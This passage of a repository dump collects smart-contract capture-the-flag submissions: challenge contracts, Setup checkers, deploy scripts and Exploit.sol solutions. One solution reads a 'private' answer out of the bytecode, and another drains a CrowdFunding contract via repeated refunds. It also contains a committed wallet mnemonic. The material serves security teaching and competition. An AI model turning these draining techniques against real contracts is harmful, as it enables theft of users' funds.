6 | contract Setup is ISetup { 7 | HauntedDungeon public instance; 8 | 9 | constructor() payable { 10 | require(msg.value == 9 ether); 11 | 12 | instance = new HauntedDungeon{value: 9 ether}(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return instance.treasure() == 0; 18 | } 19 | } -------------------------------------------------------------------------------- /luksgrin/instructions/reference/README.md: -------------------------------------------------------------------------------- 1 | # Example CTF submission 2 | 3 | > Don't deploy the solution (`Exploit.sol`) to a public chain! 4 | 5 | | Contract | Goerli | 6 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 7 | | ExampleQuizExploit.sol | [0xA0331995c8Af192294A6e0E81E4D12e9C651ed57](https://goerli.etherscan.io/address/0xA0331995c8Af192294A6e0E81E4D12e9C651ed57) | 8 | | Setup.sol | [0x9715B922a7ee51b4572C8EDC76251783409A8fa6](https://goerli.etherscan.io/address/0x9715B922a7ee51b4572C8EDC76251783409A8fa6) | 9 | 10 | `.env` file 11 | 12 | ``` 13 | ETHERSCAN_API= 14 | ALCHEMY_API_KEY_GOERLI= 15 | PRIVATE_KEY= 16 | ``` 17 | -------------------------------------------------------------------------------- /luksgrin/instructions/reference/contracts/ExampleQuizExploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | /* Reference challenge: holds ether and pays out its whole balance to a caller who guesses `answer`. */ contract ExampleQuizExploit { 4 | // Private number, will not be public at all ;) /* `private` only stops other contracts from reading the value through Solidity; a constant is compiled into the deployed bytecode, which anyone can inspect, so it is not a secret. Contract code and storage are never a safe place for one. */ 5 | uint8 private constant answer = 4; 6 | 7 | constructor() payable {} 8 | 9 | /* Requires exactly 1 ether per call. When n equals answer, forwards the contract's entire balance to the caller and reverts if that transfer fails; on a wrong guess the ether stays in the contract. */ function guess(uint8 n) external payable { 10 | require(msg.value == 1 ether); 11 | 12 | if(n == answer) { 13 | // Send all ether to user 14 | (bool success, ) = msg.sender.call{ value: address(this).balance }(''); 15 | require(success, 'send fail'); 16 | } 17 | } 18 | } 
-------------------------------------------------------------------------------- /luksgrin/instructions/reference/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ExampleQuizExploit.sol'; 4 | 5 | contract Exploit { 6 | constructor(ExampleQuizExploit instance) payable { 7 | require(msg.value == 1 ether); 8 | instance.guess{value: 1 ether}(4); 9 | } 10 | } -------------------------------------------------------------------------------- /luksgrin/instructions/reference/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /luksgrin/instructions/reference/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './ExampleQuizExploit.sol'; 5 | 6 | contract Setup is ISetup { 7 | ExampleQuizExploit public instance; 8 | 9 | constructor() payable { 10 | require(msg.value == 1 ether); 11 | 12 | instance = new ExampleQuizExploit{value: 1 ether}(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return address(instance).balance == 0; 18 | } 19 | } -------------------------------------------------------------------------------- /luksgrin/instructions/reference/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 
7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /luksgrin/instructions/reference/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "dotenv": "^14.3.2" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /luksgrin/instructions/reference/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => 
setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "ExampleQuizExploit", 16 | await setup.instance() 17 | ); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf to", ctf.address); 21 | 22 | // wait for etherscan to index 23 | await sleep(300); 24 | 25 | // verify 26 | await hre.run("verify:verify", { 27 | address: setup.address, 28 | }); 29 | await hre.run("verify:verify", { 30 | address: ctf.address, 31 | }); 32 | } 33 | 34 | main() 35 | .then(() => process.exit(0)) 36 | .catch((error) => { 37 | console.error(error); 38 | process.exit(1); 39 | }); 40 | -------------------------------------------------------------------------------- /luksgrin/instructions/reference/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy({ value: parseEther("1") }); 8 | const ctf = await ethers.getContractAt( 9 | "ExampleQuizExploit", 10 | await setup.instance() 11 | ); 12 | 13 | console.log("solved:", await setup.isSolved()); 14 | 15 | await EXPLOIT.deploy(ctf.address, { value: parseEther("1") }); 16 | 17 | console.log("solved:", await setup.isSolved()); 18 | } 19 | 20 | main() 21 | .then(() => process.exit(0)) 22 | .catch((error) => { 23 | console.error(error); 24 | process.exit(1); 25 | }); 26 | -------------------------------------------------------------------------------- /mhchia/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 
| coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /mhchia/README.md: -------------------------------------------------------------------------------- 1 | # CrowdFunding CTF 2 | 3 | 4 | | Contract | Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | CrowdFunding.sol | [0xc2c83168e3bf85a5deabf25f9f9873085c201c79](https://goerli.etherscan.io/address/0xc2c83168e3bf85a5deabf25f9f9873085c201c79) | 7 | | Setup.sol | [0x6c06959586640de3bcde69bdcebf2efda5d3983b](https://goerli.etherscan.io/address/0x6c06959586640de3bcde69bdcebf2efda5d3983b) | 8 | -------------------------------------------------------------------------------- /mhchia/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './CrowdFunding.sol'; 4 | 5 | contract Exploit { 6 | address owner; 7 | CrowdFunding instance; 8 | constructor(address _instance) payable { 9 | owner = msg.sender; 10 | instance = CrowdFunding(_instance); 11 | } 12 | 13 | function finalize() external payable { 14 | require(msg.sender == owner, "not owner"); 15 | require(msg.value >= 2 wei, "cheap"); 16 | uint256 k = msg.value; 17 | for (uint256 i = 0; i < k; i++) { 18 | instance.startCampaign{value: 1 wei}(); 19 | } 20 | instance.stopCampaign{value: 0 wei}(k - 1); 21 | instance.getRefund{value: 1 wei}(k - 1, 0); 22 | } 23 | 24 | receive() external payable { 25 | 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /mhchia/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | 
} 8 | -------------------------------------------------------------------------------- /mhchia/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './CrowdFunding.sol'; 5 | 6 | contract Setup is ISetup { 7 | CrowdFunding public instance; 8 | 9 | constructor() payable { 10 | require(msg.value == 1 wei); 11 | 12 | instance = new CrowdFunding{value: 1 wei}(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return address(instance).balance == 0; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /mhchia/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. 
To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /mhchia/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "dotenv": "^14.3.2" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /mhchia/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = 
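await SETUP.deploy({ value: 1 }); /* value is in wei: Setup's constructor on this page requires msg.value == 1 wei, so parseEther("1") (1 ether) would make the deployment revert */ 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "CrowdFunding", 16 | await setup.instance() 17 | ); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf to", ctf.address); 21 | 22 | // wait for etherscan to index 23 | await sleep(300); 24 | 25 | // verify 26 | await hre.run("verify:verify", { 27 | address: setup.address, 28 | }); 29 | await hre.run("verify:verify", { 30 | address: ctf.address, 31 | }); 32 | } 33 | 34 | main() 35 | .then(() => process.exit(0)) 36 | .catch((error) => { 37 | console.error(error); 38 | process.exit(1); 39 | }); 40 | -------------------------------------------------------------------------------- /mhchia/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | /* Deploys Setup, prints isSolved(), deploys Exploit against the challenge instance, then prints isSolved() again. */ async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | /* value is in wei: Setup's constructor requires msg.value == 1 wei, so parseEther("1") would revert */ const setup = await SETUP.deploy({ value: 1 }); 8 | const ctf = await ethers.getContractAt( 9 | "CrowdFunding", 10 | await setup.instance() 11 | ); 12 | 13 | console.log("solved:", await setup.isSolved()); 14 | 15 | await EXPLOIT.deploy(ctf.address, { value: parseEther("2") }); 16 | 17 | console.log("solved:", await setup.isSolved()); 18 | } 19 | 20 | main() 21 | .then(() => process.exit(0)) 22 | .catch((error) => { 23 | console.error(error); 24 | process.exit(1); 25 | }); 26 | -------------------------------------------------------------------------------- /naps62/.eslintignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | 3 | -------------------------------------------------------------------------------- /naps62/.eslintrc.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 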
| extends: ['plugin:prettier/recommended'], 3 | plugins: ['prettier'], 4 | parserOptions: { 5 | ecmaVersion: 2018, 6 | }, 7 | rules: { 8 | 'prettier/prettier': 'error', 9 | }, 10 | }; 11 | -------------------------------------------------------------------------------- /naps62/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | 3 | npm-debug.log* 4 | yarn-debug.log* 5 | yarn-error.log* 6 | artifacts/ 7 | cache/ 8 | typechain-types/ 9 | docs/ 10 | .openzeppelin/ 11 | deployments/localhost 12 | node_modules/ 13 | -------------------------------------------------------------------------------- /naps62/.prettierrc: -------------------------------------------------------------------------------- 1 | { 2 | "plugins": ["prettier-plugin-solidity"], 3 | "overrides": [ 4 | { 5 | "files": "*.js", 6 | "options": { 7 | "tabWidth": 2, 8 | "singleQuote": true, 9 | "useTabs": false, 10 | "trailingComma": "all", 11 | "semi": true 12 | } 13 | }, 14 | { 15 | "files": "*.sol", 16 | "options": { 17 | "tabWidth": 4, 18 | "printWidth": 200 19 | } 20 | } 21 | ] 22 | } 23 | -------------------------------------------------------------------------------- /naps62/.projections.json: -------------------------------------------------------------------------------- 1 | { 2 | "contracts/*.sol": { "alternate": "test/contracts/{}.ts" }, 3 | "test/contracts/*.ts": { "alternate": "contracts/{}.sol" }, 4 | "scripts/*.ts": { "alternate": "test/scripts/{}.ts" }, 5 | "test/scripts/*.ts": { "alternate": "scripts/{}.ts" } 6 | } 7 | -------------------------------------------------------------------------------- /naps62/.solhint.json: -------------------------------------------------------------------------------- 1 | { 2 | "extends": "solhint:default", 3 | "rules": { 4 | "line-length": false 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /naps62/.solhintignore: 
-------------------------------------------------------------------------------- 1 | contracts/math/BancorFormula.sol 2 | contracts/math/Power.sol 3 | -------------------------------------------------------------------------------- /naps62/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Subvisual LDA 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /naps62/README.md: -------------------------------------------------------------------------------- 1 | # Secureum CARE-X Sherlock 2 | 3 | | Contract | Goerli | 4 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 5 | | ExampleQuizExploit.sol | [0xA1BCb047E9dc4aCcB36c14288239f9283DF3E68e](https://goerli.etherscan.io/address/0xA1BCb047E9dc4aCcB36c14288239f9283DF3E68e) | 6 | | Setup.sol | [0x4742FD1862E94dc74AeD62A96B6374E68e658f80](https://goerli.etherscan.io/address/0x4742FD1862E94dc74AeD62A96B6374E68e658f80) | 7 | 8 | 9 | * CTF requirements: https://github.com/sherlock-protocol/sherlock-ctf-0x0 10 | * CTF example: https://github.com/sherlock-protocol/sherlock-ctf-example 11 | * Inspiration: https://github.com/blockthreat/blocksec-ctfs 12 | -------------------------------------------------------------------------------- /naps62/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: None 2 | pragma solidity 0.7.2; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /naps62/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: None 2 | pragma solidity 0.7.2; 3 | 4 | import "./ISetup.sol"; 5 | import "./BuiltByANoob.sol"; 6 | 7 | contract Setup is ISetup { 8 | BuiltByANoob public instance; 9 | 10 | address originalOwner; 11 | 12 | constructor() { 13 | originalOwner = msg.sender; 14 | instance = new BuiltByANoob(); 15 | emit Deployed(address(instance)); 16 | } 17 | 18 | function isSolved() external view override(ISetup) returns (bool) { 19 | return instance.won(); 
20 | } 21 | } 22 | -------------------------------------------------------------------------------- /naps62/deploy/deploy.ts: -------------------------------------------------------------------------------- 1 | import { ethers } from "hardhat"; 2 | 3 | import type { HardhatRuntimeEnvironment } from "hardhat/types"; 4 | import type { DeployFunction, Deployment } from "hardhat-deploy/types"; 5 | 6 | /* hardhat-deploy script: deploys the Setup contract from the named account "deployer", with logging enabled. */ const func: DeployFunction = async function (env) { 7 | const { deploy } = env.deployments; 8 | const { deployer } = await env.getNamedAccounts(); 9 | 10 | await deploy("Setup", { from: deployer, log: true }); 11 | }; 12 | 13 | export default func; 14 | -------------------------------------------------------------------------------- /naps62/deployments/goerli/.chainId: -------------------------------------------------------------------------------- 1 | 5 -------------------------------------------------------------------------------- /naps62/hardhat.config.ts: -------------------------------------------------------------------------------- 1 | import { task } from "hardhat/config"; 2 | 3 | import "@typechain/hardhat"; 4 | import "@nomiclabs/hardhat-ethers"; 5 | import "@nomiclabs/hardhat-web3"; 6 | import "@nomiclabs/hardhat-waffle"; 7 | import "hardhat-gas-reporter"; 8 | import "hardhat-deploy"; 9 | import "@nomiclabs/hardhat-etherscan"; 10 | 11 | import type { HardhatUserConfig } from "hardhat/config"; 12 | 13 | task("accounts", "Prints the list of accounts", async (args, hre) => { 14 | const accounts = await hre.ethers.getSigners(); 15 | 16 | for (const account of accounts) { 17 | console.log(account.address); 18 | } 19 | }); 20 | 21 | /* NOTE(review): this mnemonic is committed to the repository, and the config below passes it as the accounts for both the hardhat and the goerli network, so every key derived from it is public and anything those accounts hold or deploy on goerli can be controlled by any reader of the repo. Keep a checked-in mnemonic to the local hardhat network and load the goerli signer from an environment variable that is not committed. */ const devMnemonic = 22 | "core tornado motion pigeon kiss dish differ asthma much ritual black foil"; 23 | 24 | const config: HardhatUserConfig = { 25 | solidity: { 26 | version: "0.7.2", 27 | settings: { 28 | optimizer: { 29 | enabled: true, 30 | runs: 20, 31 | }, 32 | }, 33 | }, 34 | networks: { 35 | hardhat: { 36 | accounts: { 37 | 
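/**
 * Local check for the challenge: deploys Setup, reads the victim address from
 * the log Setup emitted during deployment, then asserts that deploying
 * Exploit against that address is enough for `setup.isSolved()` to be true.
 */
describe("Example", () => {
  let owner: SignerWithAddress;

  let Exploit: ContractFactory;
  let setup: Setup;
  let victim: BuiltByANoob;

  beforeEach(async () => {
    [owner] = await ethers.getSigners();

    const SetupFactory = await ethers.getContractFactory("Setup");
    Exploit = await ethers.getContractFactory("Exploit");

    setup = (await SetupFactory.deploy()) as Setup;

    // NOTE(review): the filter carries no block range, so this relies on the
    // provider's default range covering the deployment block. Confirm before
    // running against anything other than the local automining node.
    const [deployLog] = await ethers.provider.getLogs({
      address: setup.address,
    });

    // Fail with a readable message instead of a TypeError on `deployLog.data`
    // when the provider returns no log for the Setup address.
    if (deployLog === undefined) {
      throw new Error(`no deployment log found for Setup at ${setup.address}`);
    }

    // Assumes the first log's data is a single ABI-encoded, unindexed address
    // (the victim instance). Setup.sol is not shown here; confirm.
    const [victimAddress] = ethers.utils.defaultAbiCoder.decode(
      ["address"],
      deployLog.data
    );

    victim = (await ethers.getContractAt(
      "BuiltByANoob",
      victimAddress,
      owner
    )) as BuiltByANoob;
  });

  it("works", async () => {
    // The test calls nothing on the exploit after deployment, so whatever
    // solves the challenge has to happen while Exploit is being deployed.
    await Exploit.deploy(victim.address);

    expect(await setup.isSolved()).to.eq(true);
  });
});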
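# Network names that get_account's disabled local-network branch used to
# check; nothing else in this module reads them.
NON_FORKED_LOCAL_BLOCKCHAIN_ENVIRONMENTS = ["hardhat", "development", "ganache"]
LOCAL_BLOCKCHAIN_ENVIRONMENTS = NON_FORKED_LOCAL_BLOCKCHAIN_ENVIRONMENTS + [
    "mainnet-fork",
    "binance-fork",
    "matic-fork",
]
DECIMALS = 18


def get_account(index=None, id=None):
    """Return the brownie account the scripts should sign with.

    Resolution order:
      1. ``index`` given -> ``accounts[index]`` (a node-provided account).
      2. ``id`` given    -> ``accounts.load(id)`` (a stored brownie account).
      3. otherwise       -> the private key returned by ``enc.run_decryption()``
         is added to ``accounts`` and that account is returned.

    ``accounts`` and ``enc`` are module-level names; ``enc`` is imported from
    the directory named by ``CRYPTO_TOOLS_PATH`` in ``.env``, so whatever that
    path points at is executed on import and handles the key material.
    """
    # `if index:` treated index 0 as "not given", so a caller asking for the
    # first local account silently fell through to the decrypted key and
    # signed with it instead.
    if index is not None:
        return accounts[index]
    if id:
        return accounts.load(id)

    # Only the private half of the returned pair is used here.
    _public_key, private_key = enc.run_decryption()
    return accounts.add(private_key)


def padHexTo32Bytes(input, side):
    """Zero-pad a hex string to a whole number of 32-byte (64 hex char) words.

    ``side`` selects where the zeros go: a value containing "upper" or "left"
    pads in front, one containing "lower" or "right" pads behind
    (case-insensitive, front checked first).

    An empty string still yields one full zero word, as before. A non-empty
    string whose length is already a multiple of 64 is returned unchanged;
    previously it got an extra, unintended 64-zero word.

    NOTE(review): the length is taken as-is, so a leading "0x" would be
    counted as two hex characters; presumably callers pass bare hex.

    Raises:
        ValueError: if ``side`` names neither direction (this used to fall
            off the end and return ``None``).
    """
    pad_len = (-len(input)) % 64 if input else 64
    zeros = "0" * pad_len

    where = side.lower()
    if 'upper' in where or 'left' in where:
        return zeros + input
    if 'lower' in where or 'right' in where:
        return input + zeros
    raise ValueError(
        "side must contain 'upper'/'left' or 'lower'/'right', got %r" % (side,)
    )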
//SPDX-License-Identifier: MIT

pragma solidity 0.8.4;

import "./ISetup.sol";
import "./Combination.sol";

/// @title Challenge entry point
/// @notice Deploys one Combination instance and reports whether it has been unlocked.
contract Setup is ISetup {
    /// @notice The Combination instance created in the constructor.
    Combination public combination;

    /// @dev The five constructor arguments are fixed literals in this source;
    ///      their meaning is defined in Combination.sol, which is not shown here.
    constructor() {
        Combination deployed = new Combination(32, 2, 8, 2, 180);
        combination = deployed;
        emit Deployed(address(deployed));
    }

    /// @notice True once `combination.unlocked()` returns true.
    function isSolved() external view override returns (bool) {
        return combination.unlocked();
    }
}
1" 8 | }, 9 | "keywords": [], 10 | "author": "", 11 | "license": "ISC", 12 | "devDependencies": { 13 | "@nomiclabs/hardhat-ethers": "^2.0.5", 14 | "@nomiclabs/hardhat-etherscan": "^3.0.1", 15 | "@nomiclabs/hardhat-waffle": "^2.0.2", 16 | "chai": "^4.3.6", 17 | "ethereum-waffle": "^3.4.0", 18 | "ethers": "^5.5.4", 19 | "hardhat": "^2.8.4" 20 | }, 21 | "dependencies": { 22 | "dotenv": "^16.0.0" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /saianmk/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | // We require the Hardhat Runtime Environment explicitly here. This is optional 2 | // but useful for running the script in a standalone fashion through `node